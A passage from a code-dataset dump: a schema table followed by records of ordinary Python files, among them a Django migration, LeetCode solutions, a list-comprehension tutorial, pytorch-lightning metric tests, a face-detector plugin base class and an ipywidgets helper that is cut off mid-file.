Dataset schema (one column per field in the records below):

| Column | Type | Range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3 to 616 |
| content_id | string | length 40 |
| detected_licenses | sequence | length 0 to 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k to 681M, may be null (⌀) |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes, may be null |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 to 2023-09-14 21:59:50, may be null (⌀) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 to 2023-08-21 12:35:19, may be null (⌀) |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 to 10.2M |
| extension | string | 188 classes |
| content | string | length 3 to 10.2M |
| authors | sequence | length 1 |
| author_id | string | length 1 to 132 |
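Each record below follows this schema, with fields separated by `|` in the order listed and the raw file `content` embedded inline. The short sketch that follows shows how records with these columns might be inspected with the Hugging Face `datasets` library; the dataset repository id is a placeholder, and the streaming/filter/take calls are the standard `datasets` API rather than anything specific to this dump.

from datasets import load_dataset

# "<dataset-repo>" is a placeholder; substitute the actual dataset repository id.
ds = load_dataset("<dataset-repo>", split="train", streaming=True)

# Keep only permissively licensed Python files under 1 MB, then peek at a few records.
small_permissive = ds.filter(
    lambda row: row["license_type"] == "permissive" and row["length_bytes"] < 1_000_000
)
for row in small_permissive.take(3):
    print(row["repo_name"], row["path"], row["length_bytes"])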
d2a116fd1e388ccc8ebd0e3a4c78b63d1b0b2041 | cc08f8eb47ef92839ba1cc0d04a7f6be6c06bd45 | /Personal/Cmmercial/products/migrations/0001_initial.py | 3f1b13821e51314afd7b2052f0cec407866a824f | [] | no_license | ProsenjitKumar/PycharmProjects | d90d0e7c2f4adc84e861c12a3fcb9174f15cde17 | 285692394581441ce7b706afa3b7af9e995f1c55 | refs/heads/master | 2022-12-13T01:09:55.408985 | 2019-05-08T02:21:47 | 2019-05-08T02:21:47 | 181,052,978 | 1 | 1 | null | 2022-12-08T02:31:17 | 2019-04-12T17:21:59 | null | UTF-8 | Python | false | false | 1,216 | py | # Generated by Django 2.1.3 on 2018-11-21 08:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('image', models.ImageField(blank=True, upload_to='product_photo/')),
('description', models.TextField()),
('price', models.IntegerField()),
],
),
migrations.CreateModel(
name='ProductCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
],
),
migrations.AddField(
model_name='product',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.ProductCategory'),
),
]
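# Editor's note (not part of the generated file): a migration like this is produced by
# `python manage.py makemigrations products` and applied with `python manage.py migrate products`.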
| [
"[email protected]"
] | |
e3554e38fb6ff22a2f5045724ea53f7595a4c7e5 | 10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94 | /Python/number-of-unequal-triplets-in-array.py | b5c5df654ed10cc8343e709f7badcabd6c662a00 | [
"MIT"
] | permissive | kamyu104/LeetCode-Solutions | f54822059405ef4df737d2e9898b024f051fd525 | 4dc4e6642dc92f1983c13564cc0fd99917cab358 | refs/heads/master | 2023-09-02T13:48:26.830566 | 2023-08-28T10:11:12 | 2023-08-28T10:11:12 | 152,631,182 | 4,549 | 1,651 | MIT | 2023-05-31T06:10:33 | 2018-10-11T17:38:35 | C++ | UTF-8 | Python | false | false | 551 | py | # Time: O(n * k) = O(3 * n)
# Space: O(n + k) = O(n)
import collections
# freq table, dp
class Solution(object):
def unequalTriplets(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
K = 3
cnt = collections.Counter()
dp = [0]*K # dp[i]: number of unequal (i+1)-plets
for x in nums:
cnt[x] += 1
other_cnt = 1
for i in xrange(K):
dp[i] += other_cnt
other_cnt = dp[i]-cnt[x]*other_cnt
return dp[K-1]
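# Editor's note (not part of the original solution): under Python 2 (where xrange is defined),
# Solution().unequalTriplets([4, 4, 2, 4, 3]) evaluates to 3; the qualifying index triplets are
# (0, 2, 4), (1, 2, 4) and (2, 3, 4), each holding three pairwise-distinct values.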
| [
"[email protected]"
] | |
333b9acb1c421772b36728887c628c06910f5ea9 | 47deebe6fefedb01fdce5d4e82f58bb08f8e1e92 | /python core/Lesson_9/list_15.py | 3c9f1848f5a41869c089d25a9f31a5453ed7030e | [] | no_license | developeryuldashev/python-core | 5bb162603bdb5782acf05e3fb25ca5dd6347067a | 08fca77c9cfde69d93a7875b3fb65b98f3dabd78 | refs/heads/main | 2023-08-21T03:33:12.160133 | 2021-10-19T04:56:53 | 2021-10-19T04:56:53 | 393,383,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | a=[1,2,3,4,5,6,3,4,5,8,9]
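# Editor's note (not part of the original script): walking the list from the end in steps of two,
# b collects a[10], a[8], ..., a[0] and c collects a[9], a[7], ..., a[1] plus, on the final pass
# (i == 1), a[i-2] == a[-1], i.e. the last element once more.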
b=[]
c=[]
n=len(a)
i=n
while i>0:
b.append(a[i-1])
c.append(a[i-2])
i-=2
print(b)
print(c) | [
"[email protected]"
] | |
300add98b274304dbcde91ccbb0f8fb7c2bda876 | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pandas/tests/series/test_internals.py | 0febda9b710f4d9388ea3bf53da20bcf4f5af3c0 | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:cef8d1aa7b5483d0f8576d8863c0fa66a3fd81948992238d8d5f1a5531cee05a
size 8984
| [
"github@cuba12345"
] | github@cuba12345 |
14dc45b7b1ffbddfdfb9e556d2237d15b7495403 | 14d940630ab365be939fc08d3d95b0a98789bae7 | /lab32_list_comprehension_parte1.py | ab0e3c4e44cd1d99e38f7d80a38a5e3f85b41e0a | [] | no_license | accolombini/python_completo | 1da6f58f0c57b978d70582d96dc12b80c2d5b8a8 | 935102173a1112273b09734392dca08d76e9c749 | refs/heads/master | 2023-01-09T07:51:15.494101 | 2020-10-11T23:39:08 | 2020-10-11T23:39:08 | 283,790,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,343 | py | """
List Comprehension ->> using list comprehension we can generate new lists with data processed
from another iterable (a collection of data)
- List comprehension syntax
- [item clause for item in iterable]
<$> To better understand what is going on, split the expression into two parts:
- The first part: for item in iterable
- The second part: item <-> the operation expressed in the clause is applied to it
"""
# Examples
numeros = [1, 2, 3, 4, 5]  # Our example iterable
print(f'In this first example our list -> {numeros}\nIts type is -> {type(numeros)}')
# Note the power of the list comprehension
res = [numero * 10 for numero in numeros]
print(f'In this first example we multiply every element of the list by 10 -> {res}\nIts type is -> {type(res)}')
# More examples of what a comprehension can do
res = [numero / 2 for numero in numeros]
print(f'In this example we divide every element of the list by 2 -> {res}\nIts type is -> {type(res)}')
def funcao(valor):
    """
    Function used to exercise the power of the comprehension
    :param valor: Parameter passed to the function ->> it receives the values coming from the iterable
    :return: Returns the value multiplied by itself
    """
    return valor * valor
res = [funcao(numero) for numero in numeros]
print(f'In this example we work with the test function -> {res}\nIts type is -> {type(res)}')
# Comparing the differences =>> list comprehension vs. loop
# Loop
numeros = [1, 2, 3, 4, 5]
numeros_dobrados = []
for numero in numeros:
    numero_dobrado = numero * 2
    numeros_dobrados.append(numero_dobrado)
print(f'Comparing list comprehension vs. loop -> loop {numeros_dobrados}\nIts type is {type(numeros_dobrados)}')
# Refactoring the code above so it feels less painful next to the comprehension version
numeros_dobrados = []
for numero in [1, 2, 3, 4, 5]:
    numeros_dobrados.append(numero * 2)
print(f'Comparing, after refactoring, list comprehension vs. loop -> loop {numeros_dobrados}\nIts type is {type(numeros_dobrados)}')
# The same example using a list comprehension ->> note both forms and how much simpler this one is!
res = [numero * 2 for numero in numeros]
print(f'The same example with a list comprehension {res}')
print(f'The same example with a list comprehension {[numero * 2 for numero in numeros]}')
# Other examples
# Example 1 -> we want to put every character in upper case
nome = 'Python para Ciência de Dados'
print(f'Examples of list comprehension usage -> {[letra.upper() for letra in nome]}\nIts type is -> {type([letra.upper() for letra in nome])}')
# Example 2 -> we want to capitalise only the first character
amigos = ['joão', 'pedro', 'fernando', 'mariana', 'carlos']
print(f'First letter capitalised -> {[amigo.title() for amigo in amigos]}')
# Example 3 -> working with range -> we want to multiply by 10 a list generated by range
print(f'Working with range -> {[numero * 10 for numero in range(1, 10)]}')
# Example 4 -> converting a list to boolean
print(f'Convert to Boolean -> {[bool(valor) for valor in [0, [],"", True, 1, 2, 3, 100.37]]}')
# Example 5 -> turning numbers into strings using a cast
print(f'Tranformando números em strings -> {[str(letra) for letra in [1, 2, 3, 4, 5]]}')
| [
"[email protected]"
] | |
7af3564ec490ee7c916717f5e43254d06bac12c9 | 3c73609eea12d6784ffc0be5acc6994cda19dc57 | /Codeforces Difficulty 500-700/595AVitalyAndNight.py | c02b2a9caee1ba24e4511fe2d5b3542c6977975d | [] | no_license | TanveshT/Competitive-Programming | 0cf7a8ebc20a74cb6fd8505e67fbfec5bac6b8c2 | 47acc0a2af2711c86bb0da06e961677a8ec1e7d3 | refs/heads/master | 2022-12-19T01:44:46.033633 | 2020-09-25T06:57:23 | 2020-09-25T06:57:23 | 258,095,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | n, m = map(int, input().split())
m2 = 2*m
count = 0
for i in range(n):
floor = list(map(int, input().split()))
for j in range(0,m2,2):
if floor[j] == 1 or floor[j+1] == 1:
count += 1
print(count) | [
"[email protected]"
] | |
50d52ee48c67426db276446ad0379118ac996184 | b4c2bbf32748f381f8918c2c20d2a86b5453dc87 | /plugins/extract/detect/_base.py | b737b6386a1f08673c4091bad17a567f57a21522 | [
"MIT"
] | permissive | oveis/DeepVideoFaceSwap | d45c7a18204f851a5c8b9cb6c9618284d4314b59 | e507f94d4f5d74c36e41c386c6fb14bb745a4885 | refs/heads/dev-gan-model | 2022-07-14T10:06:08.131201 | 2019-07-09T00:48:16 | 2019-07-09T00:48:16 | 184,978,011 | 6 | 5 | MIT | 2022-06-21T22:00:38 | 2019-05-05T04:09:53 | Python | UTF-8 | Python | false | false | 13,579 | py | #!/usr/bin/env python3
""" Base class for Face Detector plugins
Plugins should inherit from this class
See the override methods for which methods are
required.
For each source frame, the plugin must pass a dict to finalize containing:
{"filename": <filename of source frame>,
"image": <source image>,
"detected_faces": <list of BoundingBoxes>} (Class defined in /lib/faces_detect)
"""
import logging
import os
import traceback
from io import StringIO
import cv2
from lib.faces_detect import BoundingBox
from lib.gpu_stats import GPUStats
from lib.utils import rotate_landmarks, GetModel
from plugins.extract._config import Config
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def get_config(plugin_name):
""" Return the config for the requested model """
return Config(plugin_name).config_dict
class Detector():
""" Detector object """
def __init__(self, loglevel,
git_model_id=None, model_filename=None, rotation=None, min_size=0):
logger.debug("Initializing %s: (loglevel: %s, git_model_id: %s, model_filename: %s, "
"rotation: %s, min_size: %s)", self.__class__.__name__, loglevel,
git_model_id, model_filename, rotation, min_size)
self.config = get_config(".".join(self.__module__.split(".")[-2:]))
self.loglevel = loglevel
self.rotation = self.get_rotation_angles(rotation)
self.min_size = min_size
self.parent_is_pool = False
self.init = None
self.error = None
# The input and output queues for the plugin.
# See lib.queue_manager.QueueManager for getting queues
self.queues = {"in": None, "out": None}
# Path to model if required
self.model_path = self.get_model(git_model_id, model_filename)
# Target image size for passing images through the detector
# Set to tuple of dimensions (x, y) or int of pixel count
self.target = None
# Approximate VRAM used for the set target. Used to calculate
# how many parallel processes / batches can be run.
# Be conservative to avoid OOM.
self.vram = None
# For detectors that support batching, this should be set to
# the calculated batch size that the amount of available VRAM
# will support. It is also used for holding the number of threads/
# processes for parallel processing plugins
self.batch_size = 1
logger.debug("Initialized _base %s", self.__class__.__name__)
# <<< OVERRIDE METHODS >>> #
def initialize(self, *args, **kwargs):
""" Inititalize the detector
Tasks to be run before any detection is performed.
Override for specific detector """
logger.debug("initialize %s (PID: %s, args: %s, kwargs: %s)",
self.__class__.__name__, os.getpid(), args, kwargs)
self.init = kwargs.get("event", False)
self.error = kwargs.get("error", False)
self.queues["in"] = kwargs["in_queue"]
self.queues["out"] = kwargs["out_queue"]
def detect_faces(self, *args, **kwargs):
""" Detect faces in rgb image
Override for specific detector
Must return a list of BoundingBox's"""
try:
if not self.init:
self.initialize(*args, **kwargs)
except ValueError as err:
logger.error(err)
exit(1)
logger.debug("Detecting Faces (args: %s, kwargs: %s)", args, kwargs)
# <<< GET MODEL >>> #
@staticmethod
def get_model(git_model_id, model_filename):
""" Check if model is available, if not, download and unzip it """
if model_filename is None:
logger.debug("No model_filename specified. Returning None")
return None
if git_model_id is None:
logger.debug("No git_model_id specified. Returning None")
return None
cache_path = os.path.join(os.path.dirname(__file__), ".cache")
model = GetModel(model_filename, cache_path, git_model_id)
return model.model_path
# <<< DETECTION WRAPPER >>> #
def run(self, *args, **kwargs):
""" Parent detect process.
This should always be called as the entry point so exceptions
are passed back to parent.
Do not override """
try:
logger.debug("Executing detector run function")
self.detect_faces(*args, **kwargs)
except Exception as err: # pylint: disable=broad-except
logger.error("Caught exception in child process: %s: %s", os.getpid(), str(err))
# Display traceback if in initialization stage
if not self.init.is_set():
logger.exception("Traceback:")
tb_buffer = StringIO()
traceback.print_exc(file=tb_buffer)
logger.trace(tb_buffer.getvalue())
exception = {"exception": (os.getpid(), tb_buffer)}
self.queues["out"].put(exception)
exit(1)
# <<< FINALIZE METHODS>>> #
def finalize(self, output):
""" This should be called as the final task of each plugin
Performs fianl processing and puts to the out queue """
if isinstance(output, dict):
logger.trace("Item out: %s", {key: val
for key, val in output.items()
if key != "image"})
if self.min_size > 0 and output.get("detected_faces", None):
output["detected_faces"] = self.filter_small_faces(output["detected_faces"])
else:
logger.trace("Item out: %s", output)
self.queues["out"].put(output)
def filter_small_faces(self, detected_faces):
""" Filter out any faces smaller than the min size threshold """
retval = list()
for face in detected_faces:
face_size = (face.width ** 2 + face.height ** 2) ** 0.5
if face_size < self.min_size:
logger.debug("Removing detected face: (face_size: %s, min_size: %s",
face_size, self.min_size)
continue
retval.append(face)
return retval
# <<< DETECTION IMAGE COMPILATION METHODS >>> #
def compile_detection_image(self, input_image,
is_square=False, scale_up=False, to_rgb=False, to_grayscale=False):
""" Compile the detection image """
image = input_image.copy()
if to_rgb:
image = image[:, :, ::-1]
elif to_grayscale:
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # pylint: disable=no-member
scale = self.set_scale(image, is_square=is_square, scale_up=scale_up)
image = self.scale_image(image, scale)
return [image, scale]
def set_scale(self, image, is_square=False, scale_up=False):
""" Set the scale factor for incoming image """
height, width = image.shape[:2]
if is_square:
if isinstance(self.target, int):
dims = (self.target ** 0.5, self.target ** 0.5)
self.target = dims
source = max(height, width)
target = max(self.target)
else:
source = (width * height) ** 0.5
if isinstance(self.target, tuple):
self.target = self.target[0] * self.target[1]
target = self.target ** 0.5
if scale_up or target < source:
scale = target / source
else:
scale = 1.0
logger.trace("Detector scale: %s", scale)
return scale
@staticmethod
def scale_image(image, scale):
""" Scale the image """
# pylint: disable=no-member
if scale == 1.0:
return image
height, width = image.shape[:2]
interpln = cv2.INTER_LINEAR if scale > 1.0 else cv2.INTER_AREA
dims = (int(width * scale), int(height * scale))
if scale < 1.0:
logger.trace("Resizing image from %sx%s to %s.",
width, height, "x".join(str(i) for i in dims))
image = cv2.resize(image, dims, interpolation=interpln)
return image
# <<< IMAGE ROTATION METHODS >>> #
@staticmethod
def get_rotation_angles(rotation):
""" Set the rotation angles. Includes backwards compatibility for the
'on' and 'off' options:
- 'on' - increment 90 degrees
- 'off' - disable
- 0 is prepended to the list, as whatever happens, we want to
scan the image in it's upright state """
rotation_angles = [0]
if not rotation or rotation.lower() == "off":
logger.debug("Not setting rotation angles")
return rotation_angles
if rotation.lower() == "on":
rotation_angles.extend(range(90, 360, 90))
else:
passed_angles = [int(angle)
for angle in rotation.split(",")]
if len(passed_angles) == 1:
rotation_step_size = passed_angles[0]
rotation_angles.extend(range(rotation_step_size,
360,
rotation_step_size))
elif len(passed_angles) > 1:
rotation_angles.extend(passed_angles)
logger.debug("Rotation Angles: %s", rotation_angles)
return rotation_angles
def rotate_image(self, image, angle):
""" Rotate the image by given angle and return
Image with rotation matrix """
if angle == 0:
return image, None
return self.rotate_image_by_angle(image, angle)
@staticmethod
def rotate_rect(bounding_box, rotation_matrix):
""" Rotate a BoundingBox based on the rotation_matrix"""
logger.trace("Rotating BoundingBox")
bounding_box = rotate_landmarks(bounding_box, rotation_matrix)
return bounding_box
@staticmethod
def rotate_image_by_angle(image, angle,
rotated_width=None, rotated_height=None):
""" Rotate an image by a given angle.
From: https://stackoverflow.com/questions/22041699 """
logger.trace("Rotating image: (angle: %s, rotated_width: %s, rotated_height: %s)",
angle, rotated_width, rotated_height)
height, width = image.shape[:2]
image_center = (width/2, height/2)
rotation_matrix = cv2.getRotationMatrix2D( # pylint: disable=no-member
image_center, -1.*angle, 1.)
if rotated_width is None or rotated_height is None:
abs_cos = abs(rotation_matrix[0, 0])
abs_sin = abs(rotation_matrix[0, 1])
if rotated_width is None:
rotated_width = int(height*abs_sin + width*abs_cos)
if rotated_height is None:
rotated_height = int(height*abs_cos + width*abs_sin)
rotation_matrix[0, 2] += rotated_width/2 - image_center[0]
rotation_matrix[1, 2] += rotated_height/2 - image_center[1]
logger.trace("Rotated image: (rotation_matrix: %s", rotation_matrix)
return (cv2.warpAffine(image, # pylint: disable=no-member
rotation_matrix,
(rotated_width, rotated_height)),
rotation_matrix)
# << QUEUE METHODS >> #
def get_item(self):
""" Yield one item from the queue """
item = self.queues["in"].get()
if isinstance(item, dict):
logger.trace("Item in: %s", item["filename"])
else:
logger.trace("Item in: %s", item)
if item == "EOF":
logger.debug("In Queue Exhausted")
# Re-put EOF into queue for other threads
self.queues["in"].put(item)
return item
def get_batch(self):
""" Get items from the queue in batches of
self.batch_size
First item in output tuple indicates whether the
queue is exhausted.
Second item is the batch
Remember to put "EOF" to the out queue after processing
the final batch """
exhausted = False
batch = list()
for _ in range(self.batch_size):
item = self.get_item()
if item == "EOF":
exhausted = True
break
batch.append(item)
logger.trace("Returning batch size: %s", len(batch))
return (exhausted, batch)
# <<< MISC METHODS >>> #
@staticmethod
def get_vram_free():
""" Return free and total VRAM on card with most VRAM free"""
stats = GPUStats()
vram = stats.get_card_most_free()
logger.verbose("Using device %s with %sMB free of %sMB",
vram["device"],
int(vram["free"]),
int(vram["total"]))
return int(vram["card_id"]), int(vram["free"]), int(vram["total"])
@staticmethod
def set_predetected(width, height):
""" Set a BoundingBox for predetected faces """
# Predetected_face is used for sort tool.
# Landmarks should not be extracted again from predetected faces,
# because face data is lost, resulting in a large variance
# against extract from original image
logger.debug("Setting predetected face")
return [BoundingBox(0, 0, width, height)]
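# --- Editor's illustrative sketch (not part of the original module) -----------------------
# A minimal plugin following the contract in the module docstring: inherit from Detector,
# pull items from the "in" queue, attach a list of BoundingBox objects and hand each dict to
# finalize(). The class name and the use of set_predetected() as a stand-in "detector" are
# assumptions for illustration only; real plugins run an actual face detection model here.
class ExampleDetect(Detector):
    """ Toy detector that marks the whole frame as a single face """
    def detect_faces(self, *args, **kwargs):
        super().detect_faces(*args, **kwargs)
        while True:
            item = self.get_item()
            if item == "EOF":
                break
            height, width = item["image"].shape[:2]
            item["detected_faces"] = self.set_predetected(width, height)
            self.finalize(item)
        self.queues["out"].put("EOF")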
| [
"[email protected]"
] | |
cf11d468c235daf41b6fa67bdd4fd202349ff255 | 579ddcffa5519d0cfde6209d3c030e12b487b05f | /LeetCode_June2020/is_subsequence.py | 28c96b53d3390b07c328f9bf06bdb376456dfb6f | [] | no_license | mrshaikh4u/Problem-solving | 001e00292e531c4205b80785f617c6189ec9f2a8 | 96b257e2053eaaa75a152e92657cbf39f9169b8a | refs/heads/master | 2022-11-13T19:48:43.565431 | 2022-11-03T18:42:49 | 2022-11-03T18:42:49 | 252,262,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py |
class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if t is None or len(t)==0:
return s is None or len(s)==0
if s is None or len(s)==0:
return True
# s = "abc", t = "ahbgdc"
ptr = 0
for c in s:
found = False
while ptr < len(t):
if t[ptr] == c:
found = True
ptr+=1
break
ptr+=1
if found == False:
return False
return True
obj = Solution()
print(obj.isSubsequence("","abcd"))
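# Editor's note (not part of the original file): the call above prints True, since the empty
# string is a subsequence of any string and is handled by the early-return branch.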
| [
"[email protected]"
] | |
781fed99b49ba8f6c143ba1f942e9603e3a68d20 | e32a75c44ef9c964bc5f97712c8e0e845ee3f6ca | /lemmatise_question_vocab.py | 74408714d90e2917500ed5edbe53dc9a64b74ca6 | [] | no_license | ankita-kalra/ivqa_belief_set | 29c40ec4076433ac412728aea603e4e69ce530eb | 6ebba50ff001e1af6695bb3f4d2643e7072ee153 | refs/heads/master | 2020-04-05T17:17:00.834303 | 2018-08-27T09:59:16 | 2018-08-27T09:59:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,499 | py | with open('data/vqa_trainval_question_word_counts.txt', 'r') as fs:
lines = fs.readlines()
words = [line.split()[0].strip() for line in lines]
with open('tmp_dump.txt', 'w') as fs:
for word in words:
fs.write('%s\n' % word)
from nltk.corpus import wordnet as wn
import nltk
import numpy as np
def is_noun(tag):
return tag in ['NN', 'NNS', 'NNP', 'NNPS']
def is_verb(tag):
return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']
def is_adverb(tag):
return tag in ['RB', 'RBR', 'RBS']
def is_adjective(tag):
return tag in ['JJ', 'JJR', 'JJS']
def penn_to_wn(tag):
if is_adjective(tag):
return wn.ADJ
elif is_noun(tag):
return wn.NOUN
elif is_adverb(tag):
return wn.ADV
elif is_verb(tag):
return wn.VERB
return None
# generated lemmatized words
lemmatized = []
for i, word in enumerate(words):
pos_tag = nltk.pos_tag([word])
tag = pos_tag[0][-1]
wn_type = penn_to_wn(tag)
if wn_type is None:
lem_word = word
else:
lem_word = nltk.stem.WordNetLemmatizer().lemmatize(word, wn_type)
lemmatized.append(lem_word)
# build mapping
vocab = {word: i for i, word in enumerate(words)}
index = []
for lem_word, word in zip(lemmatized, words):
try:
id = vocab[lem_word]
except:
id = vocab[word]
index.append(id)
index = np.array(index, dtype=np.int32)
from scipy.io import savemat
savemat('data/quest_token2lemma.mat', {'word2lemma': index}) | [
"[email protected]"
] | |
fad4277ce6037da4dbeb48ec277ee28b3e0372c9 | 9e1df555176bae216828c404ad7290c2eb030cbf | /tests/metrics/test_metric.py | d97cd1a176cf294208e20b3b3e4a764318141b3c | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] | permissive | shijianjian/pytorch-lightning | e11be4d4926a1a0c8f605e596bec19926d476876 | b6f3cf5e52dddedec6f7b3e85c0702b75907452c | refs/heads/master | 2023-03-02T14:58:54.139540 | 2021-02-10T05:38:23 | 2021-02-10T05:38:23 | 318,134,795 | 1 | 0 | Apache-2.0 | 2020-12-03T09:05:46 | 2020-12-03T09:05:45 | null | UTF-8 | Python | false | false | 3,841 | py | import pickle
from collections import OrderedDict
from distutils.version import LooseVersion
import cloudpickle
import numpy as np
import pytest
import torch
from pytorch_lightning.metrics.metric import Metric
torch.manual_seed(42)
class Dummy(Metric):
name = "Dummy"
def __init__(self):
super().__init__()
self.add_state("x", torch.tensor(0), dist_reduce_fx=None)
def update(self):
pass
def compute(self):
pass
def test_inherit():
a = Dummy()
def test_add_state():
a = Dummy()
a.add_state("a", torch.tensor(0), "sum")
assert a._reductions["a"](torch.tensor([1, 1])) == 2
a.add_state("b", torch.tensor(0), "mean")
assert np.allclose(a._reductions["b"](torch.tensor([1.0, 2.0])).numpy(), 1.5)
a.add_state("c", torch.tensor(0), "cat")
assert a._reductions["c"]([torch.tensor([1]), torch.tensor([1])]).shape == (2,)
with pytest.raises(ValueError):
a.add_state("d1", torch.tensor(0), 'xyz')
with pytest.raises(ValueError):
a.add_state("d2", torch.tensor(0), 42)
with pytest.raises(ValueError):
a.add_state("d3", [torch.tensor(0)], 'sum')
with pytest.raises(ValueError):
a.add_state("d4", 42, 'sum')
def custom_fx(x):
return -1
a.add_state("e", torch.tensor(0), custom_fx)
assert a._reductions["e"](torch.tensor([1, 1])) == -1
def test_add_state_persistent():
a = Dummy()
a.add_state("a", torch.tensor(0), "sum", persistent=True)
assert "a" in a.state_dict()
a.add_state("b", torch.tensor(0), "sum", persistent=False)
if LooseVersion(torch.__version__) >= LooseVersion("1.6.0"):
assert "b" not in a.state_dict()
def test_reset():
class A(Dummy):
pass
a = A()
assert a.x == 0
a.x = torch.tensor(5)
a.reset()
assert a.x == 0
def test_update():
class A(Dummy):
def update(self, x):
self.x += x
a = A()
assert a.x == 0
assert a._computed is None
a.update(1)
assert a._computed is None
assert a.x == 1
a.update(2)
assert a.x == 3
assert a._computed is None
def test_compute():
class A(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
a = A()
assert 0 == a.compute()
assert 0 == a.x
a.update(1)
assert a._computed is None
assert a.compute() == 1
assert a._computed == 1
a.update(2)
assert a._computed is None
assert a.compute() == 2
assert a._computed == 2
# called without update, should return cached value
a._computed = 5
assert a.compute() == 5
def test_forward():
class A(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
a = A()
assert a(5) == 5
assert a._forward_cache == 5
assert a(8) == 8
assert a._forward_cache == 8
assert a.compute() == 13
class ToPickle(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
def test_pickle(tmpdir):
# doesn't tests for DDP
a = ToPickle()
a.update(1)
metric_pickled = pickle.dumps(a)
metric_loaded = pickle.loads(metric_pickled)
assert metric_loaded.compute() == 1
metric_loaded.update(5)
assert metric_loaded.compute() == 5
metric_pickled = cloudpickle.dumps(a)
metric_loaded = cloudpickle.loads(metric_pickled)
assert metric_loaded.compute() == 1
def test_state_dict(tmpdir):
""" test that metric states can be removed and added to state dict """
metric = Dummy()
assert metric.state_dict() == OrderedDict()
metric.persistent(True)
assert metric.state_dict() == OrderedDict(x=0)
metric.persistent(False)
assert metric.state_dict() == OrderedDict()
| [
"[email protected]"
] | |
4e8c3e29671d3b8ee93186ca9cb39e1dc9041ad6 | 0fbc2dff6c74d79fcdc3170c8bfb2fe8fa955175 | /notebooks/widget_org.py | 624b1b94ee375d5ac5c91a1f23818bb2cee26729 | [
"BSD-3-Clause"
] | permissive | mwcraig/tutorial | abedcaa251d63d7de4a0c17f99a7f7dd7639d086 | e1dfa624b0d043f33b768edeb35629741f4d890f | refs/heads/master | 2022-11-08T15:09:04.056005 | 2019-07-07T22:06:12 | 2019-07-07T23:04:16 | 134,425,268 | 0 | 0 | BSD-3-Clause | 2018-05-22T14:11:30 | 2018-05-22T14:11:30 | null | UTF-8 | Python | false | false | 7,088 | py | import string
import inspect
from collections import defaultdict
import ipywidgets as widgets
def extract_module_name(obj, full=False):
"""
Get the name of a module for an object.
"""
properties = inspect.getmembers(obj)
for name, value in properties:
if name == '__module__':
if full:
return value.split('.')[-1]
else:
return value
else:
        raise ValueError('How odd...no module was found!')
def organized_widgets(organize_by='ui'):
"""
Return a dictionary of all DOM widgets organized by either which module
they are in or by the type of UI.
Parameters
----------
organize_by : str, optional
Must be one of 'ui' or 'module'. Determines the keys in the returned
dictionary.
Returns
-------
dict
Dictionary whose keys are the names of the widget groups and whose
values are dictionaries. The dictionaries which are the values of
``groups`` have the name of the widget to be displayed as
the key and the class of the widget as the value.
"""
valid_organizations = ['ui', 'module']
if organize_by not in valid_organizations:
        raise ValueError(f'Invalid value {organize_by} for organize_by. '
                         f'Valid options are: {valid_organizations}')
all_wids = inspect.getmembers(widgets)
# for a in all_wids:
# name = a[0]
# arf = a[1]
# if (not name.startswith('_') and
# name[0] in string.ascii_uppercase and
# issubclass(arf, widgets.DOMWidget)):
# print('woot')
widget_dict = {name: wid for name, wid in all_wids
if not name.startswith('_') and
name[0] in string.ascii_uppercase and
issubclass(wid, widgets.DOMWidget) and
name != 'DOMWidget'
}
if organize_by == 'ui':
containers = ['Box', 'VBox', 'HBox', 'GridBox',
'Accordion', 'Tab', 'AppLayout', 'GridspecLayout',
'TwoByTwoLayout']
groups = dict(
sliders={k: v for k, v in widget_dict.items() if 'Slider' in k},
buttons={k: v for k, v in widget_dict.items() if 'Button' in k},
containers={k: v for k, v in widget_dict.items() if k in containers},
texts={k: v for k, v in widget_dict.items() if 'text' in k or 'Text' in k or 'HTML' in k or k in ['Label', 'Password']},
progress={k: v for k, v in widget_dict.items() if 'Progress' in k},
